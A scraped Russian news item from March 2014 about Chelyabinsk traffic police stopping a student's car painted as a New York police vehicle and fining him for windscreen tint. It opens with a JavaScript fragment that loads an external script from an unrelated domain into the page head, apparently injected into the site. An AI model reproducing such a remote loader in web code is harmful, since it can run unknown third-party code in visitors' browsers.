, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Челябинские полицейские задержали автомобиль «полицейского департамента Нью-Йорка»

Около главного корпуса ЮУрГУ сотрудники ГИБДД остановили автомобиль, расписанный в стиле американской полиции: с надписью «полицейский департамент Нью-Йорка» и соответствующим гербом. Полицейские не признали «собрата» и оштрафовали водителя за тонировку лобового стекла.

Интересно, что на рамках номеров псевдополицейской машины указано, что ее владелец имеет какое-то отношение к Федеральной службе безопасности Российской Федерации, а на крыше автомобиля была размещена синяя «мигалка».

Такой внушительный вид автомобиля не смутил стражей порядка. Выяснилось, что за рулем машины «полицейского департамента Нью-Йорка» был обычный челябинский студент 19 лет от роду. Снимать на месте пленку тонировки он отказался, и сотрудники ГИБДД скрутили номера с грозного авто.

Полицейские пояснили, что эксплуатация автомобиля с тонированным лобовым стеклом запрещена. А вот к внешнему виду машины они претензий не имеют, поскольку запрету подлежит только нанесение символики российских спецслужб. «Мигалка» на крыше оказалась лишь муляжом.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
17:17 - 13 марта 2014
|
автор: U-RSS
|
(602)
|
(0)

Комментарии (0)

Я человек
Я бот